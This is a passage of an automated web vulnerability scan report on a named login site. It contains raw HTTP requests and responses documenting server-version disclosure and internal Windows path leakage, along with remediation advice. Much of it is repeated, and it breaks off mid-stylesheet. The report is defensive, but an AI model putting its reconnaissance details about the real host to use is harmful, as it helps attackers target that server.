Remediation
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /
/ |
Extracted Version
Microsoft-IIS/7.0
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=AALJIJIDEFKEIFFNDOFOFIAN; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=AALJIJIDEFKEIFFNDOFOFIAN; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
[Possible] Internal Path Leakage (Windows)
[Possible] Internal Path Leakage (Windows)
4
TOTAL
INFORMATION
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
- Error messages should be disabled.
- Remove this kind of sensitive data from the output.
External References
|
- /AccountManager/
/AccountManager/ |
Identified Internal Path(s)
d:\inetpub\login.vindicosuite.com\AccountManager\
Request
GET /AccountManager/ HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
|
- /AccountManager/ResetPassword/
/AccountManager/ResetPassword/ |
Identified Internal Path(s)
d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\
Request
GET /AccountManager/ResetPassword/ HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5475
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/ResetPassword/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5475
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/ResetPassword/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\ResetPassword\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
|
- /App_Themes/
/App_Themes/ |
Identified Internal Path(s)
d:\inetpub\login.vindicosuite.com\App_Themes\
Request
GET /App_Themes/ HTTP/1.1
Referer: http://login1.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 